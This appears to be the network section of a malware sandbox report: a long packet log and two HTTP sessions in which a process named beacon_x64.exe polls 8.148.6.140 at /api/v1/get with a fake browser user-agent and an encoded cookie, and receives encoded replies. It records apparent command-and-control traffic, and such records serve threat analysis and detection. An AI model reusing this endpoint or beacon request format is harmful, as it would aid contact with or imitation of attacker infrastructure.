          Jan 10, 2025 09:28:07.663774967 CET5009280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:07.663959026 CET5009280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:07.668785095 CET80500928.148.6.140192.168.2.6
          Jan 10, 2025 09:28:07.775410891 CET5009380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:07.780390024 CET80500938.148.6.140192.168.2.6
          Jan 10, 2025 09:28:07.780464888 CET5009380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:07.780637980 CET5009380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:07.785476923 CET80500938.148.6.140192.168.2.6
          Jan 10, 2025 09:28:08.681519985 CET80500938.148.6.140192.168.2.6
          Jan 10, 2025 09:28:08.682246923 CET5009380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:08.682348967 CET5009380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:08.687129021 CET80500938.148.6.140192.168.2.6
          Jan 10, 2025 09:28:08.793508053 CET5009480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:08.798362970 CET80500948.148.6.140192.168.2.6
          Jan 10, 2025 09:28:08.798546076 CET5009480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:08.798888922 CET5009480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:08.803639889 CET80500948.148.6.140192.168.2.6
          Jan 10, 2025 09:28:12.802654982 CET5009480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:12.984889984 CET5009580192.168.2.68.148.6.140
          Jan 10, 2025 09:28:12.989780903 CET80500958.148.6.140192.168.2.6
          Jan 10, 2025 09:28:12.991069078 CET5009580192.168.2.68.148.6.140
          Jan 10, 2025 09:28:12.994018078 CET5009580192.168.2.68.148.6.140
          Jan 10, 2025 09:28:12.998862982 CET80500958.148.6.140192.168.2.6
          Jan 10, 2025 09:28:13.890955925 CET80500958.148.6.140192.168.2.6
          Jan 10, 2025 09:28:13.891017914 CET5009580192.168.2.68.148.6.140
          Jan 10, 2025 09:28:13.891108990 CET5009580192.168.2.68.148.6.140
          Jan 10, 2025 09:28:13.895865917 CET80500958.148.6.140192.168.2.6
          Jan 10, 2025 09:28:14.009885073 CET5009680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:14.015010118 CET80500968.148.6.140192.168.2.6
          Jan 10, 2025 09:28:14.015145063 CET5009680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:14.015264034 CET5009680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:14.020090103 CET80500968.148.6.140192.168.2.6
          Jan 10, 2025 09:28:14.994836092 CET80500968.148.6.140192.168.2.6
          Jan 10, 2025 09:28:14.994918108 CET5009680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:14.994978905 CET80500968.148.6.140192.168.2.6
          Jan 10, 2025 09:28:14.995215893 CET5009680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:15.103070974 CET5009680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:15.103072882 CET5009780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:15.107968092 CET80500968.148.6.140192.168.2.6
          Jan 10, 2025 09:28:15.107988119 CET80500978.148.6.140192.168.2.6
          Jan 10, 2025 09:28:15.108099937 CET5009780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:15.108460903 CET5009780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:15.113284111 CET80500978.148.6.140192.168.2.6
          Jan 10, 2025 09:28:19.111131907 CET80500978.148.6.140192.168.2.6
          Jan 10, 2025 09:28:19.111150980 CET80500978.148.6.140192.168.2.6
          Jan 10, 2025 09:28:19.111335039 CET5009780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:19.112241030 CET5009780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:19.117033958 CET80500978.148.6.140192.168.2.6
          Jan 10, 2025 09:28:19.230103970 CET5009880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:19.234942913 CET80500988.148.6.140192.168.2.6
          Jan 10, 2025 09:28:19.239279985 CET5009880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:19.239536047 CET5009880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:19.244539022 CET80500988.148.6.140192.168.2.6
          Jan 10, 2025 09:28:20.096354961 CET80500988.148.6.140192.168.2.6
          Jan 10, 2025 09:28:20.096431971 CET5009880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:20.096486092 CET5009880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:20.103038073 CET80500988.148.6.140192.168.2.6
          Jan 10, 2025 09:28:20.213263988 CET5009980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:20.218204975 CET80500998.148.6.140192.168.2.6
          Jan 10, 2025 09:28:20.218280077 CET5009980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:20.218405962 CET5009980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:20.223129988 CET80500998.148.6.140192.168.2.6
          Jan 10, 2025 09:28:21.079124928 CET80500998.148.6.140192.168.2.6
          Jan 10, 2025 09:28:21.079649925 CET5009980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:21.079649925 CET5009980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:21.084655046 CET80500998.148.6.140192.168.2.6
          Jan 10, 2025 09:28:21.199014902 CET5010080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:21.204018116 CET80501008.148.6.140192.168.2.6
          Jan 10, 2025 09:28:21.204129934 CET5010080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:21.204240084 CET5010080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:21.208987951 CET80501008.148.6.140192.168.2.6
          Jan 10, 2025 09:28:22.168569088 CET80501008.148.6.140192.168.2.6
          Jan 10, 2025 09:28:22.168622017 CET80501008.148.6.140192.168.2.6
          Jan 10, 2025 09:28:22.168629885 CET5010080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:22.168668032 CET5010080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:22.168773890 CET5010080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:22.173526049 CET80501008.148.6.140192.168.2.6
          Jan 10, 2025 09:28:22.276107073 CET5010180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:22.280972004 CET80501018.148.6.140192.168.2.6
          Jan 10, 2025 09:28:22.281037092 CET5010180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:22.281198978 CET5010180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:22.285979986 CET80501018.148.6.140192.168.2.6
          Jan 10, 2025 09:28:23.276449919 CET80501018.148.6.140192.168.2.6
          Jan 10, 2025 09:28:23.276518106 CET80501018.148.6.140192.168.2.6
          Jan 10, 2025 09:28:23.276552916 CET80501018.148.6.140192.168.2.6
          Jan 10, 2025 09:28:23.276628017 CET5010180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:23.276628017 CET5010180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:23.278995991 CET5010180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:23.283807993 CET80501018.148.6.140192.168.2.6
          Jan 10, 2025 09:28:23.386992931 CET5010280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:23.391819000 CET80501028.148.6.140192.168.2.6
          Jan 10, 2025 09:28:23.391905069 CET5010280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:23.392055035 CET5010280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:23.396783113 CET80501028.148.6.140192.168.2.6
          Jan 10, 2025 09:28:24.249017954 CET80501028.148.6.140192.168.2.6
          Jan 10, 2025 09:28:24.249068975 CET5010280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:24.249391079 CET5010280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:24.261780024 CET80501028.148.6.140192.168.2.6
          Jan 10, 2025 09:28:24.360678911 CET5010380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:24.365483999 CET80501038.148.6.140192.168.2.6
          Jan 10, 2025 09:28:24.365550995 CET5010380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:24.365695953 CET5010380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:24.370475054 CET80501038.148.6.140192.168.2.6
          Jan 10, 2025 09:28:25.256654978 CET80501038.148.6.140192.168.2.6
          Jan 10, 2025 09:28:25.256736994 CET5010380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:25.256875992 CET5010380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:25.261624098 CET80501038.148.6.140192.168.2.6
          Jan 10, 2025 09:28:25.368870020 CET5010480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:25.373686075 CET80501048.148.6.140192.168.2.6
          Jan 10, 2025 09:28:25.373779058 CET5010480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:25.373895884 CET5010480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:25.378633022 CET80501048.148.6.140192.168.2.6
          Jan 10, 2025 09:28:26.302459002 CET80501048.148.6.140192.168.2.6
          Jan 10, 2025 09:28:26.302582026 CET5010480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:26.302664995 CET5010480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:26.307625055 CET80501048.148.6.140192.168.2.6
          Jan 10, 2025 09:28:26.416779995 CET5010680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:26.421622038 CET80501068.148.6.140192.168.2.6
          Jan 10, 2025 09:28:26.421839952 CET5010680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:26.421905041 CET5010680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:26.426776886 CET80501068.148.6.140192.168.2.6
          Jan 10, 2025 09:28:27.488518000 CET80501068.148.6.140192.168.2.6
          Jan 10, 2025 09:28:27.488549948 CET80501068.148.6.140192.168.2.6
          Jan 10, 2025 09:28:27.488588095 CET5010680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:27.488610983 CET80501068.148.6.140192.168.2.6
          Jan 10, 2025 09:28:27.488620996 CET5010680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:27.488660097 CET5010680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:27.488754988 CET5010680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:27.493618965 CET80501068.148.6.140192.168.2.6
          Jan 10, 2025 09:28:27.605540037 CET5010780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:27.610471010 CET80501078.148.6.140192.168.2.6
          Jan 10, 2025 09:28:27.610554934 CET5010780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:27.611368895 CET5010780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:27.616218090 CET80501078.148.6.140192.168.2.6
          Jan 10, 2025 09:28:28.444595098 CET80501078.148.6.140192.168.2.6
          Jan 10, 2025 09:28:28.444674015 CET5010780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:28.444808006 CET5010780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:28.449609995 CET80501078.148.6.140192.168.2.6
          Jan 10, 2025 09:28:28.558011055 CET5010880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:28.563007116 CET80501088.148.6.140192.168.2.6
          Jan 10, 2025 09:28:28.567125082 CET5010880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:28.570034027 CET5010880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:28.574943066 CET80501088.148.6.140192.168.2.6
          Jan 10, 2025 09:28:32.563205957 CET80501088.148.6.140192.168.2.6
          Jan 10, 2025 09:28:32.563323975 CET80501088.148.6.140192.168.2.6
          Jan 10, 2025 09:28:32.563407898 CET80501088.148.6.140192.168.2.6
          Jan 10, 2025 09:28:32.563627958 CET5010880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:32.565016985 CET5010880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:32.569832087 CET80501088.148.6.140192.168.2.6
          Jan 10, 2025 09:28:32.683012009 CET5010980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:32.687834978 CET80501098.148.6.140192.168.2.6
          Jan 10, 2025 09:28:32.687927961 CET5010980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:32.688064098 CET5010980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:32.692811966 CET80501098.148.6.140192.168.2.6
          Jan 10, 2025 09:28:33.546777010 CET80501098.148.6.140192.168.2.6
          Jan 10, 2025 09:28:33.546850920 CET5010980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:33.546945095 CET5010980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:33.551703930 CET80501098.148.6.140192.168.2.6
          Jan 10, 2025 09:28:33.666173935 CET5011080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:33.671120882 CET80501108.148.6.140192.168.2.6
          Jan 10, 2025 09:28:33.671215057 CET5011080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:33.671336889 CET5011080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:33.676163912 CET80501108.148.6.140192.168.2.6
          Jan 10, 2025 09:28:34.528832912 CET80501108.148.6.140192.168.2.6
          Jan 10, 2025 09:28:34.535231113 CET5011080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:34.597635984 CET5011080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:34.602739096 CET80501108.148.6.140192.168.2.6
          Jan 10, 2025 09:28:34.792635918 CET5011180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:34.797549963 CET80501118.148.6.140192.168.2.6
          Jan 10, 2025 09:28:34.797652960 CET5011180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:34.797946930 CET5011180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:34.802762032 CET80501118.148.6.140192.168.2.6
          Jan 10, 2025 09:28:35.782660961 CET80501118.148.6.140192.168.2.6
          Jan 10, 2025 09:28:35.782692909 CET80501118.148.6.140192.168.2.6
          Jan 10, 2025 09:28:35.782732010 CET5011180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:35.782819033 CET5011180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:35.782890081 CET5011180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:35.787626982 CET80501118.148.6.140192.168.2.6
          Jan 10, 2025 09:28:35.900978088 CET5011280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:35.905875921 CET80501128.148.6.140192.168.2.6
          Jan 10, 2025 09:28:35.905973911 CET5011280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:35.906119108 CET5011280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:35.910932064 CET80501128.148.6.140192.168.2.6
          Jan 10, 2025 09:28:39.896015882 CET80501128.148.6.140192.168.2.6
          Jan 10, 2025 09:28:39.896087885 CET5011280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:39.896183968 CET80501128.148.6.140192.168.2.6
          Jan 10, 2025 09:28:39.896239042 CET5011280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:39.896295071 CET5011280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:39.901014090 CET80501128.148.6.140192.168.2.6
          Jan 10, 2025 09:28:40.011436939 CET5011380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:40.016299963 CET80501138.148.6.140192.168.2.6
          Jan 10, 2025 09:28:40.016381979 CET5011380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:40.016556978 CET5011380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:40.021348953 CET80501138.148.6.140192.168.2.6
          Jan 10, 2025 09:28:40.965547085 CET80501138.148.6.140192.168.2.6
          Jan 10, 2025 09:28:40.965630054 CET80501138.148.6.140192.168.2.6
          Jan 10, 2025 09:28:40.965667009 CET5011380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:40.965734959 CET5011380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:40.965835094 CET5011380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:40.970596075 CET80501138.148.6.140192.168.2.6
          Jan 10, 2025 09:28:41.077495098 CET5011480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:41.082408905 CET80501148.148.6.140192.168.2.6
          Jan 10, 2025 09:28:41.082509995 CET5011480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:41.082988977 CET5011480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:41.087749958 CET80501148.148.6.140192.168.2.6
          Jan 10, 2025 09:28:42.057889938 CET80501148.148.6.140192.168.2.6
          Jan 10, 2025 09:28:42.057915926 CET80501148.148.6.140192.168.2.6
          Jan 10, 2025 09:28:42.058056116 CET80501148.148.6.140192.168.2.6
          Jan 10, 2025 09:28:42.058067083 CET5011480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:42.058067083 CET5011480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:42.058129072 CET5011480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:42.065376997 CET5011480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:42.070209026 CET80501148.148.6.140192.168.2.6
          Jan 10, 2025 09:28:42.181966066 CET5011580192.168.2.68.148.6.140
          Jan 10, 2025 09:28:42.186798096 CET80501158.148.6.140192.168.2.6
          Jan 10, 2025 09:28:42.186868906 CET5011580192.168.2.68.148.6.140
          Jan 10, 2025 09:28:42.187005997 CET5011580192.168.2.68.148.6.140
          Jan 10, 2025 09:28:42.191761017 CET80501158.148.6.140192.168.2.6
          Jan 10, 2025 09:28:43.160495996 CET80501158.148.6.140192.168.2.6
          Jan 10, 2025 09:28:43.160594940 CET80501158.148.6.140192.168.2.6
          Jan 10, 2025 09:28:43.160609961 CET80501158.148.6.140192.168.2.6
          Jan 10, 2025 09:28:43.160698891 CET5011580192.168.2.68.148.6.140
          Jan 10, 2025 09:28:43.160700083 CET5011580192.168.2.68.148.6.140
          Jan 10, 2025 09:28:43.161205053 CET5011580192.168.2.68.148.6.140
          Jan 10, 2025 09:28:43.165990114 CET80501158.148.6.140192.168.2.6
          Jan 10, 2025 09:28:43.277827978 CET5011680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:43.283459902 CET80501168.148.6.140192.168.2.6
          Jan 10, 2025 09:28:43.283608913 CET5011680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:43.283855915 CET5011680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:43.289613008 CET80501168.148.6.140192.168.2.6
          Jan 10, 2025 09:28:44.248059034 CET80501168.148.6.140192.168.2.6
          Jan 10, 2025 09:28:44.248109102 CET80501168.148.6.140192.168.2.6
          Jan 10, 2025 09:28:44.248128891 CET5011680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:44.248173952 CET5011680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:44.248619080 CET5011680192.168.2.68.148.6.140
          Jan 10, 2025 09:28:44.253403902 CET80501168.148.6.140192.168.2.6
          Jan 10, 2025 09:28:44.359812975 CET5011780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:44.364705086 CET80501178.148.6.140192.168.2.6
          Jan 10, 2025 09:28:44.364788055 CET5011780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:44.368863106 CET5011780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:44.373617887 CET80501178.148.6.140192.168.2.6
          Jan 10, 2025 09:28:45.325989008 CET80501178.148.6.140192.168.2.6
          Jan 10, 2025 09:28:45.326076984 CET80501178.148.6.140192.168.2.6
          Jan 10, 2025 09:28:45.326081991 CET5011780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:45.326123953 CET5011780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:45.326283932 CET5011780192.168.2.68.148.6.140
          Jan 10, 2025 09:28:45.331304073 CET80501178.148.6.140192.168.2.6
          Jan 10, 2025 09:28:45.431740046 CET5011880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:45.436703920 CET80501188.148.6.140192.168.2.6
          Jan 10, 2025 09:28:45.437031984 CET5011880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:45.437031984 CET5011880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:45.442095995 CET80501188.148.6.140192.168.2.6
          Jan 10, 2025 09:28:49.446954012 CET5011880192.168.2.68.148.6.140
          Jan 10, 2025 09:28:49.557066917 CET5011980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:49.561933041 CET80501198.148.6.140192.168.2.6
          Jan 10, 2025 09:28:49.562010050 CET5011980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:49.562189102 CET5011980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:49.566932917 CET80501198.148.6.140192.168.2.6
          Jan 10, 2025 09:28:50.534225941 CET80501198.148.6.140192.168.2.6
          Jan 10, 2025 09:28:50.534249067 CET80501198.148.6.140192.168.2.6
          Jan 10, 2025 09:28:50.534373045 CET5011980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:50.534373045 CET5011980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:50.534574986 CET5011980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:50.539340019 CET80501198.148.6.140192.168.2.6
          Jan 10, 2025 09:28:50.650964022 CET5012080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:50.655751944 CET80501208.148.6.140192.168.2.6
          Jan 10, 2025 09:28:50.659037113 CET5012080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:50.659215927 CET5012080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:50.663975000 CET80501208.148.6.140192.168.2.6
          Jan 10, 2025 09:28:51.627871990 CET80501208.148.6.140192.168.2.6
          Jan 10, 2025 09:28:51.627932072 CET5012080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:51.627958059 CET80501208.148.6.140192.168.2.6
          Jan 10, 2025 09:28:51.628032923 CET5012080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:51.628329992 CET5012080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:51.633095980 CET80501208.148.6.140192.168.2.6
          Jan 10, 2025 09:28:51.744725943 CET5012180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:51.749540091 CET80501218.148.6.140192.168.2.6
          Jan 10, 2025 09:28:51.749610901 CET5012180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:51.749761105 CET5012180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:51.754576921 CET80501218.148.6.140192.168.2.6
          Jan 10, 2025 09:28:55.741293907 CET5012180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:55.855789900 CET5012280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:55.860656977 CET80501228.148.6.140192.168.2.6
          Jan 10, 2025 09:28:55.860744953 CET5012280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:55.860958099 CET5012280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:55.865700960 CET80501228.148.6.140192.168.2.6
          Jan 10, 2025 09:28:56.808726072 CET80501228.148.6.140192.168.2.6
          Jan 10, 2025 09:28:56.808911085 CET80501228.148.6.140192.168.2.6
          Jan 10, 2025 09:28:56.809717894 CET5012280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:56.810079098 CET5012280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:56.814847946 CET80501228.148.6.140192.168.2.6
          Jan 10, 2025 09:28:56.917448997 CET5012380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:56.922260046 CET80501238.148.6.140192.168.2.6
          Jan 10, 2025 09:28:56.927175045 CET5012380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:56.927175045 CET5012380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:56.931972980 CET80501238.148.6.140192.168.2.6
          Jan 10, 2025 09:28:57.919013023 CET80501238.148.6.140192.168.2.6
          Jan 10, 2025 09:28:57.919089079 CET5012380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:57.919183016 CET80501238.148.6.140192.168.2.6
          Jan 10, 2025 09:28:57.919234991 CET5012380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:57.919235945 CET80501238.148.6.140192.168.2.6
          Jan 10, 2025 09:28:57.919281960 CET5012380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:57.919481993 CET5012380192.168.2.68.148.6.140
          Jan 10, 2025 09:28:57.924279928 CET80501238.148.6.140192.168.2.6
          Jan 10, 2025 09:28:58.036817074 CET5012480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:58.041655064 CET80501248.148.6.140192.168.2.6
          Jan 10, 2025 09:28:58.041734934 CET5012480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:58.042006969 CET5012480192.168.2.68.148.6.140
          Jan 10, 2025 09:28:58.046775103 CET80501248.148.6.140192.168.2.6
          Jan 10, 2025 09:29:02.417078018 CET80501248.148.6.140192.168.2.6
          Jan 10, 2025 09:29:02.417102098 CET80501248.148.6.140192.168.2.6
          Jan 10, 2025 09:29:02.417113066 CET80501248.148.6.140192.168.2.6
          Jan 10, 2025 09:29:02.417191029 CET5012480192.168.2.68.148.6.140
          Jan 10, 2025 09:29:02.417191029 CET5012480192.168.2.68.148.6.140
          Jan 10, 2025 09:29:02.417269945 CET5012480192.168.2.68.148.6.140
          Jan 10, 2025 09:29:02.417567015 CET80501248.148.6.140192.168.2.6
          Jan 10, 2025 09:29:02.417629957 CET5012480192.168.2.68.148.6.140
          Jan 10, 2025 09:29:02.426068068 CET80501248.148.6.140192.168.2.6
          • 8.148.6.140
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.6497098.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:24:57.372459888 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:24:58.357806921 CET313INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:24:58 GMT
          Server: nginx
          Content-Length: 128
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 79 31 43 61 54 66 2f 6d 73 57 51 35 34 4f 52 47 6b 70 48 31 67 52 32 49 37 56 5a 44 47 78 57 77 34 48 61 55 37 50 65 46 61 66 79 77 2f 47 58 73 72 4f 6f 32 62 74 78 63 33 4d 54 50 7a 42 6b 74 34 49 38 62 42 59 68 4d 45 61 6f 63 54 38 78 34 59 72 62 2f 49 6d 4a 6d 38 53 79 30 46 78 38 73 33 54 69 77 4c 34 4b 6c 48 49 4a 43 38 56 30 4c 4d 71 77 44 77 69 6f 78 44 58 33 4e 33 4f 70 76
          Data Ascii: y1CaTf/msWQ54ORGkpH1gR2I7VZDGxWw4HaU7PeFafyw/GXsrOo2btxc3MTPzBkt4I8bBYhMEaocT8x4Yrb/ImJm8Sy0Fx8s3TiwL4KlHIJC8V0LMqwDwioxDX3N3Opv


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.6497108.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:24:58.482283115 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:00.032339096 CET377INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:24:59 GMT
          Server: nginx
          Content-Length: 192
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 42 71 79 6d 37 69 69 68 2f 75 33 46 6f 50 62 70 5a 4e 42 37 64 70 45 71 6c 58 50 76 56 38 76 6e 41 30 62 64 46 59 54 71 4d 43 59 7a 2b 48 78 6c 31 48 45 6b 53 70 72 36 4e 43 37 4b 31 67 6c 6c 4c 6c 4c 67 50 4b 72 32 50 37 42 4a 54 46 7a 6f 37 63 73 4a 78 61 61 7a 4e 47 62 43 6c 58 75 34 65 38 7a 51 6c 72 42 53 34 51 66 56 46 65 36 7a 56 34 6b 4a 45 41 42 53 46 57 57 79 6c 47 59 54 75 43 6f 36 2b 58 32 50 77 4a 6d 6d 77 41 4d 58 57 53 4b 58 76 59 37 46 42 48 39 2f 58 55 74 46 6a 70 36 6e 61 47 41 7a 45 2b 53 57 72 75 6c 4f 48 68 52 7a 4f 71 31 36 37 34 52 6a 66 46 4b 61
